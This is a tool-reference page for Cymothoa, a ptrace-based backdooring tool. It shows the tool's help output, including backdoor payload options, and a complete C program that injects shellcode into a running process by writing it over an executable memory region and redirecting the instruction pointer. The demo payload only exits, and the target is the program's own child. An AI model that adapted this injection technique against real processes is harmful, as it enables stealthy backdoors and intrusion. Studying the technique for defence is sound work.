Cymothoa Introduction

Cymothoa is a stealthy backdooring tool: it injects backdoor shellcode into a process that is already running, rather than dropping a new binary on disk. It uses the ptrace interface (available on almost every *nix) to manipulate the target process and infect it in place. Because it relies on ptrace, it can only attach to processes the invoking user is allowed to trace (same uid, or CAP_SYS_PTRACE), and kernel hardening such as Yama's ptrace_scope can prevent attaching altogether.

Source: http://cymothoa.sourceforge.net/
Cymothoa homepage
Cymothoa source code repository

Tools included in the cymothoa package

bgrep - binary grep

:~# bgrep
bgrep version: 0.2
usage: bgrep <hex> [<path> [...]]

cymothoa - stealthy backdooring tool

:~# cymothoa -h
                              _
                          _  | |
  ____ _   _ ____   ___ _| |_| |__   ___  _____
 / ___) | | |    \ / _ (_   _)  _ \ / _ \(____ |
( (___| |_| | | | | |_| || |_| | | | |_| / ___ |
 \____)\__  |_|_|_|\___/  \__)_| |_|\___/\_____|
      (____/
Ver.1 (beta) - Runtime shellcode injection, for stealthy backdoors...

By codwizard ()
from ES-Malaria by ElectronicSouls (http://www.0x4553.org).

Usage:
    cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
    -p  process pid
    -s  shellcode number
    -l  memory region name for shellcode injection (default /lib/ld)
        search for "r-xp" permissions, see /proc/pid/maps...
    -m  memory region name for persistent memory (default /lib/ld)
        search for "rw-p" permissions, see /proc/pid/maps...
    -h  print this help screen
    -S  list available shellcodes

Injection options (overwrite payload flags):
    -f  fork parent process
    -F  don't fork parent process
    -b  create payload thread (probably you need also -F)
    -B  don't create payload thread
    -w  pass persistent memory address
    -W  don't pass persistent memory address
    -a  use alarm scheduler
    -A  don't use alarm scheduler
    -t  use setitimer scheduler
    -T  don't use setitimer scheduler

Payload arguments:
    -j  set timer (seconds)
    -k  set timer (microseconds)
    -x  set the IP
    -y  set the port number
    -r  set the port number 2
    -z  set the username (4 bytes)
    -o  set the password (8 bytes)
    -c  set the script code (ex: "#!/bin/sh\nls; exit 0")
        escape codes will not be interpreted...
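The `-l` and `-m` options above describe the core mechanism: pick a mapping of the target process by name and permissions from /proc/<pid>/maps (an `r-xp` region to hold the shellcode, an `rw-p` region for persistent data), write the payload into it with ptrace, and redirect execution there. The program below is an added example written for this page, not Cymothoa's source, showing that mechanism on x86-64 Linux: it forks an idle child of its own (so no root or foreign process is needed), attaches with PTRACE_ATTACH, finds the first `r-xp` mapping of the dynamic loader, pokes a constructed 12-byte `exit(42)` payload over it, points `rip` at it and resumes. Assumptions: the loader's path contains `ld-linux` (true on glibc systems; pass another name otherwise), the payload is x86-64 (chosen for this example), and `find_region` is a helper of this example, not a Cymothoa function. Unlike Cymothoa, the example does not fork the target or keep it running afterwards; it only demonstrates the attach, locate, poke and resume steps.

```c
/* Added example: ptrace-based runtime injection on x86-64 Linux.
 * Not Cymothoa's code; the payload and the "ld-linux" region name are
 * assumptions made for this demonstration. */
#define _GNU_SOURCE
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* Parse /proc/<pid>/maps text and return the first mapping whose path
 * contains `name` and whose permission field equals `perms` ("r-xp",
 * "rw-p", ...). This is the search the -l and -m options describe. */
int find_region(const char *maps, const char *name, const char *perms,
                unsigned long *start, unsigned long *end)
{
    const char *line = maps;
    while (line && *line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[512];
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        unsigned long s, e;
        char p[8] = {0}, path[256] = {0};
        /* fields: start-end perms offset dev inode [path] */
        int nf = sscanf(buf, "%lx-%lx %7s %*s %*s %*s %255s", &s, &e, p, path);
        if (nf >= 3 && strcmp(p, perms) == 0 && strstr(path, name)) {
            *start = s; *end = e;
            return 1;
        }
        line = nl ? nl + 1 : NULL;
    }
    return 0;
}

/* Constructed payload: mov edi,42 ; mov eax,60 (exit) ; syscall,
 * padded with NOPs so it is a whole number of 8-byte words for POKETEXT. */
const unsigned char shellcode[16] = {
    0xbf, 0x2a, 0x00, 0x00, 0x00, 0xb8, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05,
    0x90, 0x90, 0x90, 0x90
};

static int read_maps(pid_t pid, char *buf, size_t len)
{
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/maps", (int)pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, len - 1, f);
    buf[n] = '\0';
    fclose(f);
    return 0;
}

/* Attach to pid, write the payload into its first r-xp mapping of `region`,
 * redirect rip there and let it run. Returns 0 on success. */
int inject(pid_t pid, const char *region)
{
    int status;
    static char maps[1 << 16];
    unsigned long start, end;
    struct user_regs_struct regs;

    if (ptrace(PTRACE_ATTACH, pid, 0, 0) == -1) { perror("PTRACE_ATTACH"); return -1; }
    if (waitpid(pid, &status, 0) == -1 || !WIFSTOPPED(status)) return -1;
    if (read_maps(pid, maps, sizeof maps) < 0 ||
        !find_region(maps, region, "r-xp", &start, &end) ||
        end - start < sizeof shellcode) {
        fprintf(stderr, "no usable r-xp region matching %s\n", region);
        ptrace(PTRACE_DETACH, pid, 0, 0);
        return -1;
    }
    if (ptrace(PTRACE_GETREGS, pid, 0, &regs) == -1) return -1;
    /* POKETEXT writes one word at a time and succeeds even on pages that
     * are not writable by the target (the kernel forces the write). */
    for (size_t i = 0; i < sizeof shellcode; i += sizeof(long)) {
        long word;
        memcpy(&word, shellcode + i, sizeof word);
        if (ptrace(PTRACE_POKETEXT, pid, start + i, word) == -1) { perror("PTRACE_POKETEXT"); return -1; }
    }
    regs.rip = start;
    /* The target was stopped inside a syscall (pause). With orig_rax >= 0 the
     * kernel's syscall-restart logic would rewind rip by 2 on resume; -1
     * tells it no syscall is pending, so rip stays on our payload. */
    regs.orig_rax = (unsigned long long)-1;
    if (ptrace(PTRACE_SETREGS, pid, 0, &regs) == -1) return -1;
    return ptrace(PTRACE_CONT, pid, 0, 0) == -1 ? -1 : 0;
}

int main(void)
{
    int status;
    pid_t child = fork();
    if (child == 0) { for (;;) pause(); }          /* victim: an idle process we own */
    if (inject(child, "ld-linux") != 0) {
        kill(child, SIGKILL);
        waitpid(child, &status, 0);
        return 1;
    }
    waitpid(child, &status, 0);
    printf("victim exited with status %d (payload ran if this is 42)\n",
           WIFEXITED(status) ? WEXITSTATUS(status) : -1);
    return 0;
}
```

Build with `cc -o inject_demo inject_demo.c` and run it as an unprivileged user; attaching to your own forked child is permitted even under Yama `ptrace_scope=1`, whereas attaching to an unrelated pid (what Cymothoa's `-p` does) needs the same uid with `ptrace_scope=0`, or CAP_SYS_PTRACE. To find the region Cymothoa's `-m` option refers to instead, call `find_region` with `"rw-p"`.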

udp_server - UDP server used by Cymothoa

:~# udp_server
usage: udp_server port

cymothoa usage example

:~# coming soon